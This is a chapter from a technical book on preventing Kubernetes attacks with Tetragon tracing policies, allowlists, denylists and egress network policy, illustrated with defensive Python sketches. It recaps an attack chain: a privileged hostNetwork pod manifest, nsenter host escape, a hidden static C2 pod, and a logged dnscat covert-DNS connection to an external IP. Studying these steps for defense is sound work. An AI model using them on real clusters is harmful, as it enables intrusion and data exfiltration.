Chapter 4. Security Prevention

What if you want to prevent an attack instead of retroactively detecting it? In this chapter, we’ll use the security observability events that we detected in Chapter 3 to develop prevention policies that block the attack at different stages. Using security observability events to develop a prevention policy is called observability-driven policy: we translate security observability events directly into prevention policy based on observed, real-world behavior. Why do we suggest using real events to create such a policy?

Security prevention is a powerful tool; it can stop attacks before they occur. However, used incorrectly, it can also break legitimate application or system behavior. For example, if we created a prevention policy that blocks the setuid system call,1 we could break legitimate container runtime initialization behavior that requires the setuid system call.

So, how can you create a prevention policy that denies malicious behavior without negatively impacting your applications? By referencing your security observability events, you can quickly identify every setuid system call made in your environment. Identifying the runtime or application events that include the setuid system call keeps you from applying a breaking change to your policy.
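To make this concrete, here is a minimal Python sketch of that lookup. It assumes your events have already been exported and flattened into dictionaries with hypothetical `binary` and `syscall` fields. Real observability events, such as Tetragon's JSON output, are richer and nested differently.

```python
from collections import Counter

# Hypothetical, flattened observability events. Real events carry much more
# context (pod, process ancestry, arguments) and use a nested schema.
events = [
    {"binary": "/usr/bin/runc", "syscall": "setuid"},
    {"binary": "/usr/sbin/nginx", "syscall": "setuid"},
    {"binary": "/usr/sbin/nginx", "syscall": "openat"},
    {"binary": "/bin/bash", "syscall": "setuid"},
]


def setuid_callers(events):
    """Count setuid calls per binary so legitimate callers can be exempted."""
    return Counter(e["binary"] for e in events if e["syscall"] == "setuid")


for binary, count in sorted(setuid_callers(events).items()):
    print(f"{binary}: {count} setuid call(s)")
```

Every binary in this report that you recognize as legitimate, such as the container runtime, is a caller that a blanket setuid block would break.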

Security observability can also highlight misconfigurations or overly permissive privileges in your workloads. This gives security teams the data they need to objectively measure their security state, both in real time and historically. Security could adopt a lot from SRE: observability, blameless post-mortems, error budgets, security testing, security level objectives, and more. It’s all rooted in collecting and measuring our observability data.

Prevention by Way of Least-Privilege

Another way security observability plays a key role in your security strategy is by recording all the capabilities and system calls a workload requires during its lifecycle, so you can build a least-privilege configuration for the application. The default Docker seccomp profile, which blocks several known privilege escalation vectors in containers, was created using this technique.2 You can also reference the capabilities an application is observed using to create a least-privilege prevention policy that grants only that minimum set. This avoids the trial-and-error approach to least privilege, in which you remove capabilities and see what breaks. Observing an application’s capabilities at runtime gives us the minimal set of capabilities the application needs to run, and nothing more. Using this approach, we can create an allowlist, which defines acceptable application behavior and denies everything else.
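The following minimal Python sketch shows the core of this idea. It reduces the capabilities observed during a baseline run to a de-duplicated set, then expresses that set as a drop-all, add-back allowlist in a container securityContext. The observation format is a hypothetical simplification. The result also only covers code paths that actually ran during the baseline, so rarely exercised paths still need to be observed before you rely on it.

```python
# Hypothetical baseline observations: (workload, capability) pairs, e.g.
# aggregated from capability checks recorded while workloads ran normally.
observed = [
    ("nginx", "CAP_NET_BIND_SERVICE"),
    ("nginx", "CAP_SETUID"),
    ("nginx", "CAP_SETGID"),
    ("nginx", "CAP_NET_BIND_SERVICE"),  # duplicates are expected in raw events
    ("redis", "CAP_SETUID"),
]


def minimal_capabilities(observed, workload):
    """Return the de-duplicated, sorted capabilities one workload actually used."""
    return sorted({cap for wl, cap in observed if wl == workload})


def security_context(caps):
    """Drop everything, then add back only what was observed.

    Kubernetes manifests conventionally write capability names without CAP_.
    """
    return {"capabilities": {"drop": ["ALL"],
                             "add": [c.removeprefix("CAP_") for c in caps]}}


print(security_context(minimal_capabilities(observed, "nginx")))
```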

Using security observability to secure your applications addresses the long-standing problem of overly permissive security policies and misconfigurations, which have been responsible for countless vulnerabilities and compromises.3

An alternative security approach that doesn’t require observability is a denylist, which blocks specific known bad behavior and allows everything else. We’ll also discuss how security observability during capture the flag (CTF) and red team4 exercises can produce a more targeted and useful denylist.

Allowlist

Observability during baseline (normal) application behavior reveals the application’s required capabilities. Using baseline observability, we can build an allowlist, which specifies what actions an application is allowed to do and blocks everything else. The ideal security posture only grants the capabilities and privileges an application needs. Observability translates an application’s high-level abstractions (functions and code paths) into system calls and operating system capabilities that we can build a prevention policy around.

If we base our prevention policy on application observability, how can we be sure that our application isn’t already compromised or untrustworthy when we apply our observability? A common security pattern emerging in cloud native computing is ephemeral infrastructure or reverse uptime. The basic premise is that a system loses trust over time as its entropy increases, such as an internet-exposed application being attacked, or a platform operator installing debugging utilities in the container environment. Time and changes to a system lead to a degradation in its trust.

Using infrastructure as code, some security-conscious organizations employ a “repaving” method: they destroy and rebuild infrastructure from a known good state at a regular cadence to combat the problem of trust and entropy. A freshly deployed system is more trustworthy than a long-running system because it hasn’t experienced configuration drift, and we can account for every bit in the deployment before any changes are introduced.5 This is the optimal time to observe an application’s legitimate behavior.

We can only understand an application’s baseline behavior once we apply security observability, so it’s a requirement for building an allowlist prevention policy.

Denylist

Denylists specify the behavior that policy should deny and allow everything else. Denylists have limitations. Most notably, they block only the specific implementation of an attack they were written for, which leaves an otherwise overly permissive policy that can lead to vulnerabilities or compromise. A denylist leaves far more room to compromise an application because it blocks only known attack vectors and malicious behavior. If you’re unsure what type of behavior to deny, you can use security observability during a simulated or real attack.
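The difference in default behavior is easy to see in a few lines of Python. This is a conceptual sketch, not any particular policy engine. The actions are hypothetical strings, and the example shows how a renamed copy of an attack tool slips past a denylist written for the original binary, while an allowlist still denies it.

```python
def allowlist_decision(action, allowed):
    """Allowlist: permit only the listed actions and deny everything else."""
    return "allow" if action in allowed else "deny"


def denylist_decision(action, denied):
    """Denylist: deny only the listed actions and permit everything else."""
    return "deny" if action in denied else "allow"


# Hypothetical action strings for one workload.
allowed = {"read:/app/config.yaml", "connect:api.twitter.com:443"}
denied = {"exec:/usr/bin/nsenter"}

# The known attack tool is caught by both approaches...
known = "exec:/usr/bin/nsenter"
# ...but a renamed copy of it is denied only by the allowlist's default.
renamed = "exec:/tmp/.x/nsenter-copy"

for action in (known, renamed):
    print(action,
          "allowlist:", allowlist_decision(action, allowed),
          "denylist:", denylist_decision(action, denied))
```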

Using security observability during a CTF or red team exercise reveals common attacker tactics, techniques, and procedures (TTPs). You can use these observed techniques to build a denylist policy that safely blocks attacker behavior, following the observability-driven policy approach. Our Git repository provides example denylist prevention policies for each of the attack stages in Chapter 3.6

Testing Your Policy

Security teams in cloud native environments should follow the DevSecOps and SRE practice of testing policy changes before deploying a change that could break production workloads. We recommend following GitOps practices7 and performing a dry run of each policy change in a development or staging environment with simulated workloads. This step tests that you’re blocking only behavior that violates your policy and, crucially, that you won’t introduce breaking changes to your production workloads.

Finally, by reproducing the attack with the new prevention policy changes applied, we can test that we either safely block the attack, or that further changes are required.
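A dry run can be as simple as replaying recorded baseline events against a candidate rule and listing what it would have blocked, without enforcing anything. The Python sketch below assumes a hypothetical rule format in which every field the rule names must equal the event's field. Real policy engines offer much richer matching.

```python
# Hypothetical baseline events recorded in staging under simulated load.
baseline_events = [
    {"pod": "web", "binary": "/usr/sbin/nginx", "syscall": "setuid"},
    {"pod": "web", "binary": "/usr/sbin/nginx", "syscall": "accept4"},
    {"pod": "batch", "binary": "/usr/bin/python3", "syscall": "openat"},
]


def matches(rule, event):
    """A rule matches when every field it names equals the event's value."""
    return all(event.get(key) == value for key, value in rule.items())


def dry_run(rule, events):
    """Return the events a candidate rule would have blocked; enforce nothing."""
    return [e for e in events if matches(rule, e)]


for candidate in ({"syscall": "setuid"}, {"binary": "/usr/bin/nsenter"}):
    hits = dry_run(candidate, baseline_events)
    if hits:
        print(f"{candidate} would block {len(hits)} baseline event(s):")
        for e in hits:
            print(f"  {e['pod']}: {e['binary']}")
    else:
        print(f"{candidate} blocks no baseline events")
```

A rule that blocks baseline events, like the setuid rule here, needs an exception or a narrower selector before it is promoted.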

Tracing Policy

Whether you’re building an allowlist or a denylist, Cilium Tetragon provides an enforcement framework called tracing policy. Tracing policy is a user-configurable Kubernetes custom resource definition (CRD) that lets users trace arbitrary events in the kernel and define actions to take on a match. This is a powerful framework. eBPF can deeply introspect arbitrary process attributes, including process ancestry, binary digest, directory of binary execution, and command-line arguments, and you can develop a fully customized detection or prevention policy around any of these attributes.

Contrast this flexibility with something like seccomp, which, at a high level, defines a combination of an allowlist and a denylist of system calls for containers. Some observability tools based on seccomp can evaluate the list of system calls an application is observed making and then generate a seccomp “profile” from that list.8
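As a rough illustration of how such tools work, the Python sketch below turns a list of observed system call names into an allowlist-style profile in the JSON format Docker accepts for seccomp profiles. In that format, `defaultAction` rejects anything unlisted, and a single rule allows the observed calls. The observed list here is made up. A usable profile would also need the system calls the container runtime makes while starting the container, which is exactly the limitation the next paragraph raises.

```python
import json


def seccomp_profile(observed_syscalls):
    """Build an allowlist-style seccomp profile: allow observed calls, deny the rest."""
    return {
        # Any system call not listed below fails with an error.
        "defaultAction": "SCMP_ACT_ERRNO",
        "syscalls": [
            {"names": sorted(set(observed_syscalls)), "action": "SCMP_ACT_ALLOW"}
        ],
    }


# Hypothetical system calls observed for one workload (with duplicates).
observed = ["read", "write", "openat", "close", "read", "futex", "exit_group"]
print(json.dumps(seccomp_profile(observed), indent=2))
```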

But what if you need more flexibility than system calls? What if you need to include system calls that are required by the container runtime even if we would rather restrict them at application runtime? What if you wanted to make changes to policy dynamically without needing to restart your applications?

Tracing policy is fully Kubernetes-aware, so it can enforce on system calls or user-configurable filters after the pod has reached a Ready state.9 We can also change a policy and dynamically update the eBPF programs in the kernel, changing enforcement without restarting the applications or the node. When an event matches a tracing policy, we can either send an alert to a security analyst or prevent the behavior by sending a SIGKILL signal to the process.10
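The match-then-act model can be sketched in a few lines of Python. This only mirrors the concept. It is not Tetragon's TracingPolicy schema or implementation, which evaluates selectors in the kernel with eBPF. The `Rule` fields and action names are hypothetical, and the sketch returns the chosen action rather than signaling any process.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcessEvent:
    binary: str
    parent_binary: str
    namespace: str


@dataclass
class Rule:
    # Hypothetical selectors: a field left as None matches anything.
    binary: Optional[str] = None
    parent_binary: Optional[str] = None
    namespace: Optional[str] = None
    # "alert" notifies an analyst; "sigkill" would terminate the process.
    action: str = "alert"


def evaluate(rules, event):
    """Return the action of the first rule whose selectors all match."""
    for rule in rules:
        selectors = {
            "binary": rule.binary,
            "parent_binary": rule.parent_binary,
            "namespace": rule.namespace,
        }
        if all(want is None or getattr(event, attr) == want
               for attr, want in selectors.items()):
            return rule.action
    return "allow"


rules = [
    Rule(binary="/usr/bin/nsenter", action="sigkill"),
    Rule(binary="/bin/bash", namespace="kube-system", action="alert"),
]
print(evaluate(rules, ProcessEvent("/usr/bin/nsenter", "/bin/bash", "default")))
print(evaluate(rules, ProcessEvent("/usr/sbin/nginx", "/usr/bin/runc", "shop")))
```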

By using tracing policies, we can prevent the attack we carried out in Chapter 3 at different stages:

Exploitation

We created a privileged container, ran kubectl exec to get a shell in it, moved into the host namespaces with nsenter, and ran bash with root privileges.

Persistence

We created an invisible C2 agent pod by writing a PodSpec to the kubelet’s /etc/kubernetes/manifests directory.

Post-exploitation

We exfiltrated sensitive data with the C2 agent.

You might ask, why should I implement a prevention policy at several stages? Doesn’t it make the most sense to deny actions at the beginning of an attack? We recommend applying policy at multiple stages of an attack to follow the security principle called defense in depth.

In this context, defense in depth means building prevention policies that cover different stages. If one defense fails to block a kubectl exec, another policy is available to disrupt or block data exfiltration. Additionally, blocking certain execution actions might be too restrictive in your environment, whereas blocking lateral movement might be a more acceptable prevention policy. We provide a prevention policy for each of the stages discussed.

Stage 1: Exploitation

The first stage of the attack we carried out in Chapter 3 takes advantage of an overly permissive pod configuration to exploit the system with a hidden command and control (C2) pod. We launched a privileged pod, which is granted,11 among other things, the CAP_SYS_ADMIN Linux capability. This configuration can give a pod direct access to host resources, often with the same permissions as root on the node:

kind: Pod
…
  name: merlin-agent
  namespace: doesnt-exist
  hostNetwork: true
…
    securityContext:
      privileged: true

There are several defenses you can use against overly permissive pods being deployed in your environment. One of the most common defenses is using an admission controller in Kubernetes such as Open Policy Agent (OPA) or Kyverno. An admission controller “is a piece of code that intercepts requests to the Kubernetes API server prior to persistence of the object”12 to the Kubernetes database, etcd. For an example of how to use OPA to block commonly seen dangerous pod configurations, check out the author’s KubeCon talk.13
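The kind of check such a policy performs can be sketched in Python against a Pod manifest parsed into a dictionary. It is a simplified illustration, not OPA or Kyverno policy syntax. The container name `merlin` is hypothetical because the manifest excerpt above elides it. Like any admission control, this check only inspects objects submitted through the API server.

```python
def privileged_violations(pod):
    """Return reasons a Pod manifest should be rejected (illustrative rules only)."""
    spec = pod.get("spec", {})
    reasons = []
    if spec.get("hostNetwork"):
        reasons.append("hostNetwork: true")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            reasons.append(f"container {c['name']} is privileged")
        caps = (sc.get("capabilities") or {}).get("add", [])
        if "SYS_ADMIN" in caps or "CAP_SYS_ADMIN" in caps:
            reasons.append(f"container {c['name']} adds SYS_ADMIN")
    return reasons


pod = {
    "kind": "Pod",
    "metadata": {"name": "merlin-agent", "namespace": "doesnt-exist"},
    "spec": {
        "hostNetwork": True,
        # Hypothetical container name; the excerpt above elides it.
        "containers": [{"name": "merlin", "securityContext": {"privileged": True}}],
    },
}
print(privileged_violations(pod) or "admit")
```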

Admission controllers have some limitations. They operate at the Kubernetes API server layer, which means they protect against dangerous pod configurations that “come through the front door,” or are administered through the API server. This protection breaks down for exploits like the attack we carried out in Chapter 3, where we deployed a silent C2 agent pod directly to the kubelet, bypassing the API server altogether.

Runtime protection with Cilium Tetragon applies to all containers (or optionally, Linux processes) in a system, whether they’re submitted through the API server or run directly by the container runtime. For example, we can block every container (or Linux process) that starts with the CAP_SYS_ADMIN capability with the deny-privileged-pod.yaml14 tracing policy, as shown in Figure 4-1.

Figure 4-1. Blocking a privileged pod start by a tracing policy in Step 3
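The condition behind this policy can be stated simply: is bit 21 (CAP_SYS_ADMIN) set in a process's effective capability set? The Python sketch below checks that bit in the `CapEff` line of `/proc/<pid>/status`. It illustrates the condition only. Tetragon evaluates its policy in the kernel, and the actual logic of deny-privileged-pod.yaml is not reproduced here. The sample masks are illustrative values for a fully privileged process and a typical unprivileged container.

```python
CAP_SYS_ADMIN = 21  # capability bit number, as defined in <linux/capability.h>


def effective_caps(status_text):
    """Parse the CapEff hex bitmask from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_sys_admin(status_text):
    """True if the CAP_SYS_ADMIN bit is set in the effective capability set."""
    return bool((effective_caps(status_text) >> CAP_SYS_ADMIN) & 1)


privileged = "Name:\tbash\nCapEff:\t000001ffffffffff\n"
unprivileged = "Name:\tnginx\nCapEff:\t00000000a80425fb\n"
print(has_sys_admin(privileged), has_sys_admin(unprivileged))

# On Linux, you could inspect the current process with:
# with open("/proc/self/status") as f:
#     print(has_sys_admin(f.read()))
```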

Stage 2: Persistence and Defense Evasion

“Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.”15 In our attack, we achieved persistence by launching a C2 pod that’s managed directly by the kubelet and is hidden from the API server. This pod then established a connection to the C2 server to await instructions.
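The static pod in this attack was created by writing a file, so file observability is one place to catch it. The Python sketch below flags writes into the kubelet's manifest directory by any binary outside an expected set. The event fields and the `EXPECTED_WRITERS` set are hypothetical. In your environment, the expected writers would come from observing how static pods are legitimately managed.

```python
from pathlib import PurePosixPath

STATIC_POD_DIR = PurePosixPath("/etc/kubernetes/manifests")
# Hypothetical: binaries observed legitimately managing static pods on this node.
EXPECTED_WRITERS = {"/usr/bin/kubeadm"}


def suspicious_manifest_writes(events):
    """Return writes into the static pod directory by unexpected binaries."""
    return [
        e for e in events
        if e["op"] == "write"
        and PurePosixPath(e["path"]).is_relative_to(STATIC_POD_DIR)
        and e["binary"] not in EXPECTED_WRITERS
    ]


# Hypothetical file events from one node.
events = [
    {"binary": "/usr/bin/kubeadm", "op": "write",
     "path": "/etc/kubernetes/manifests/kube-apiserver.yaml"},
    {"binary": "/usr/bin/kubelet", "op": "read",
     "path": "/etc/kubernetes/manifests/merlin-agent.yaml"},
    {"binary": "/usr/bin/tee", "op": "write",
     "path": "/etc/kubernetes/manifests/merlin-agent.yaml"},
]
for e in suspicious_manifest_writes(events):
    print(f"{e['binary']} wrote {e['path']}")
```

Path matching is done per path component, so a sibling directory such as `/etc/kubernetes/manifests-old` is not matched by accident.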

There are several ways to prevent this behavior. One of the simplest and most effective is to employ an egress network policy that blocks arbitrary connections to the internet from pods.

However, our C2 pod circumvented network policy by using the host machine’s network namespace (hostNetwork: true), which typically places it outside the reach of pod network policies. This is known as defense evasion, which “consists of techniques that adversaries use to avoid detection throughout their compromise.”16

Other techniques for circumventing network policy include tunneling all traffic over DNS. Network policies typically allow UDP port 53 traffic so that workloads can resolve cluster services and fully qualified domain names (FQDNs). An attacker can take advantage of this “open hole” in policy to send any kind of traffic to any host, using DNS as a covert channel. This attack was discussed and demoed in the excellent KubeCon talk by Ian Coldwater and Brad Geesaman, titled Kubernetes Exposed!17 Security observability reveals the attack, as seen in the following event, where the dnscat client in the covert-channel pod connects to an external server over UDP port 53:

{
  "process_connect": {
    "process": {
      "cwd": "/tmp/.dnscat/dnscat2_client/",
      "binary": "/tmp/.dnscat/dnscat2_client/dnscat",
      "arguments": "--dns=server=35.185.234.97,port=53",
      "pod": {
        "namespace": "default",
        "name": "covert-channel",
        "labels": [
          "k8s:io.kubernetes.pod.namespace=default"
        ]
      }
    },
    "source_ip": "10.0.0.2",
    "source_port": 44415,
    "destination_ip": "35.185.234.97",
    "destination_port": 53,
    "protocol": "UDP"
  }
}

This reveals the covert DNS channel and lets you use detection data to update your prevention policy and defend against these attacks. Ironically, a hardened network policy is the best protection against this attack. CNIs such as Cilium support network policies that define which DNS server a pod can use and that filter on layer 7 attributes, such as limiting which FQDNs a pod, namespace, or cluster can query.18
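Detection data like this can be turned into a simple rule: UDP port 53 traffic to anything other than the cluster's own resolver deserves attention. The Python sketch below applies that rule to an event shaped like the one shown above. The resolver address `10.96.0.10` is a hypothetical placeholder for your cluster DNS service IP. The rule only catches direct connections to external resolvers. DNS tunneled through the cluster resolver would pass, which is why FQDN-aware policy matters.

```python
import json

# Hypothetical: the cluster DNS service IP(s) that pods are expected to use.
ALLOWED_RESOLVERS = {"10.96.0.10"}


def is_covert_dns(event):
    """Flag UDP/53 connections to resolvers other than the cluster's own."""
    conn = event["process_connect"]
    return (
        conn["protocol"] == "UDP"
        and conn["destination_port"] == 53
        and conn["destination_ip"] not in ALLOWED_RESOLVERS
    )


raw = '''{"process_connect": {
  "process": {"binary": "/tmp/.dnscat/dnscat2_client/dnscat",
              "pod": {"namespace": "default", "name": "covert-channel"}},
  "source_ip": "10.0.0.2", "source_port": 44415,
  "destination_ip": "35.185.234.97", "destination_port": 53,
  "protocol": "UDP"}}'''
event = json.loads(raw)
if is_covert_dns(event):
    p = event["process_connect"]["process"]
    print(f"DNS to non-cluster resolver from {p['pod']['name']}: {p['binary']}")
```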

Additionally, pods that use host resources in Kubernetes are a great target for observability-driven policy.19 You can configure an admission controller policy or a Cilium Tetragon tracing policy to block the dangerous hostNetwork configuration,20 as shown in Figure 4-2, and reference your security observability monitoring to verify that doing so won’t cause an outage.

Figure 4-2. A persistence attack is blocked in Step 1 using a tracing policy based on host resource declaration and in Step 3 using an egress network policy
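Before enforcing a hostNetwork block, it helps to know which existing workloads would be affected. This Python sketch scans a hypothetical inventory of Pod specs for the host namespace fields. In practice, the inventory would come from your cluster or your observability data. Infrastructure pods that legitimately need host access, such as CNI agents, would need an explicit exception.

```python
HOST_FIELDS = ("hostNetwork", "hostPID", "hostIPC")


def host_resource_users(pods):
    """Map namespace/name of each pod using host namespaces to the fields it sets."""
    report = {}
    for pod in pods:
        spec = pod.get("spec", {})
        used = [field for field in HOST_FIELDS if spec.get(field)]
        if used:
            meta = pod["metadata"]
            report[f"{meta['namespace']}/{meta['name']}"] = used
    return report


# Hypothetical inventory; the pod names are made up.
inventory = [
    {"metadata": {"namespace": "kube-system", "name": "cilium-x7k2p"},
     "spec": {"hostNetwork": True, "hostPID": False}},
    {"metadata": {"namespace": "shop", "name": "web-5c8d"}, "spec": {}},
    {"metadata": {"namespace": "monitoring", "name": "node-exporter-q4zt9"},
     "spec": {"hostNetwork": True, "hostPID": True}},
]
for pod, fields in host_resource_users(inventory).items():
    print(pod, fields)
```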

Stage 3: Post-Exploitation

Post-exploitation refers to the actions an attacker takes after a compromise of a system. Post-exploitation behavior can include command and control, lateral movement, data exfiltration, and more. In the attack we carried out in Chapter 3, post-exploitation refers to the C2 agent making a connection to the C2 server hosted at the benign-looking linux-libs.org domain and awaiting instructions from the attacker.

There are several defenses for post-exploitation behavior. The most effective protection you can take is limiting the network connections your pods can make, particularly to the internet. The internet should be considered a hostile zone for production workloads, and in our example we define a layer 7 network policy at Step 1 that blocks all connections to the internet, other than the api.twitter.com hostname. Lateral movement is another post-exploitation behavior that can be mitigated by employing a locked-down network policy. Cilium provides a free resource to visually create a locked-down network policy.21
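At its core, the layer 7 policy described in the paragraph above is a default-deny egress rule with a single allowed FQDN. The Python sketch below captures only that decision logic. It is not how Cilium enforces FQDN policy, which relies on observing DNS responses to learn the IPs behind each name. Names are normalized for case and a trailing dot, and matching is exact, so a look-alike name that merely contains the allowed hostname is still denied.

```python
# Hypothetical egress allowlist: exact FQDNs a pod may connect to.
EGRESS_ALLOWLIST = {"api.twitter.com"}


def normalize(fqdn):
    """Lowercase and strip the trailing root dot so equivalent names compare equal."""
    return fqdn.lower().rstrip(".")


def egress_allowed(fqdn, allowlist=EGRESS_ALLOWLIST):
    """Default deny: allow only exact matches against the allowlist."""
    return normalize(fqdn) in {normalize(a) for a in allowlist}


for name in ("api.twitter.com", "linux-libs.org", "api.twitter.com.linux-libs.org"):
    print(name, "allow" if egress_allowed(name) else "deny")
```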

In addition to limiting the network connections a pod can make, we can limit which files a pod can access. Sensitive or high-value files are a good fit for the observability-driven policy pattern: we monitor all access to a file, and once we understand legitimate access behavior, we apply a policy that blocks any suspicious access. Figure 4-3 shows examples of policies that deny suspicious network connections and file access.

Figure 4-3. Post-exploitation attack is blocked in Step 1 using an egress network policy, in Step 3 by limiting access to a sensitive file, and in Step 4 again by using an egress network policy.
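The monitor-then-block pattern for sensitive files can be sketched in Python. First, record which binaries touched each monitored file during a baseline period. Then flag any later access by a binary never seen before. The event fields and binaries are hypothetical. The service account token path is the standard location where Kubernetes mounts the token into pods.

```python
from collections import defaultdict

TOKEN = "/var/run/secrets/kubernetes.io/serviceaccount/token"


def build_baseline(events):
    """Record which binaries legitimately accessed each monitored file."""
    baseline = defaultdict(set)
    for e in events:
        baseline[e["path"]].add(e["binary"])
    return baseline


def is_suspicious(baseline, event):
    """Flag access to a monitored file by a binary not seen in the baseline."""
    path = event["path"]
    return path in baseline and event["binary"] not in baseline[path]


# Hypothetical baseline: only the application itself reads the token.
baseline = build_baseline([
    {"binary": "/usr/local/bin/app", "path": TOKEN},
])
print(is_suspicious(baseline, {"binary": "/bin/cat", "path": TOKEN}))
print(is_suspicious(baseline, {"binary": "/usr/local/bin/app", "path": TOKEN}))
```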

Data-Driven Security

Now that we’ve locked down our environment to prevent this attack, we recommend that you keep observing and improving your security posture with security observability. Preventing an attack starts with detecting it. High-fidelity security observability not only detects malicious behavior but also provides the inputs for ongoing improvements to your prevention policy.

This data-driven workflow to create and continuously improve your security is the most crucial part of observability-driven policy.

CTFs, Red Teams, Pentesting, Oh My!

If you’d prefer to build out a detection program in a more test-friendly environment than staging or production, you can begin with CTF events. Using security observability during Kubernetes CTFs, red team exercises, and penetration testing is the best way to gain visibility into attacker techniques, and it will enable you to build out alerting and prevention policies using your own data.

The lovely folks at Control Plane created and maintain a Kubernetes CTF infrastructure you can use to familiarize yourself with Kubernetes security, all while improving your attacking skills and detection program. We recommend applying the security observability skills you’ve learned in this report during community Kubernetes CTF exercises. Even if you don’t succeed at all the CTF exercises at first, the walkthrough itself is invaluable to learn attack techniques on Kubernetes and build out your detection program.

1 The setuid system call sets the effective user ID of a process. The effective user ID is used by the operating system to determine privileges for an action.

2 In a 2016 blog post, Jessie Frazelle describes how to create your own custom seccomp profile by capturing all the system calls your workload requires, and describes how the default Docker seccomp profile was created based on such an allowlist policy.

3 Misconfiguration accounted for 59% of detected security incidents related to Kubernetes according to Red Hat’s State of Kubernetes Security Report.

4 Red teaming describes various forms of penetration testing, including authorized attacks on infrastructure and code, with the intent of improving the security of an environment by highlighting weak points in its defenses.

5 This assumes you trust your build and supply chain security. The state-of-the-art defense for supply chain security in cloud native is Sigstore, which automates digitally signing and verifying components of your build process. According to AWS CloudFormation, “Drift detection enables you to detect whether a stack’s actual configuration differs, or has drifted, from its expected configuration.”

6 Our GitHub repo contains all the events and prevention policies discussed in this book.

7 GitOps refers to the patterns in cloud native environments where changes to infrastructure are committed to a version control system, and CI/CD pipelines test and apply the changes automatically. In short, operations teams adopt development team patterns.

8 Seccomp acts on user-configurable profiles, which are configuration files that specify the system calls and arguments a container is allowed or disallowed to invoke.

9 Pod readiness gates are part of the pod lifecycle events and indicate that a pod is healthy and ready to receive traffic.

10 Additional prevention mechanisms such as the kernel’s cgroup freezer mechanism are supported, which stops a container but leaves its state (stack, file descriptors, etc.) in place for forensic extraction.

11 A privileged container is able to access and manipulate any devices on a host, thanks to being granted the CAP_SYS_ADMIN capability.

12 Admission controllers are an essential security tool to build out a security policy for Kubernetes objects.

13 In the video “The Hitchhiker’s Guide to Container Security”, we use OPA to block dangerous pod configurations.

14 Here is an example prevention policy for privileged pods.

15 Persistence techniques are described in the MITRE ATT&CK framework.

16 Defense evasion is a fascinating topic. Detection can be circumvented using novel attacker techniques, forcing detection tools to constantly improve the reliability of their visibility.

17 Ian Coldwater and Brad Geesaman discuss several attack vectors on Kubernetes clusters in this recording. It is required viewing for defenders.

18 Layer 7 network policy examples can be found on the Cilium site.

19 These include hostPID, hostIPC, hostNetwork, hostPorts, and allowedHostPaths. The Kubernetes documentation explicitly calls out that host resources are a known source of privilege escalation and should be avoided.

20 A prevention policy blocking namespace changes can be found on GitHub.

21 The Cilium CNI provides network observability via Hubble, which can also be used to create observability-driven policy.
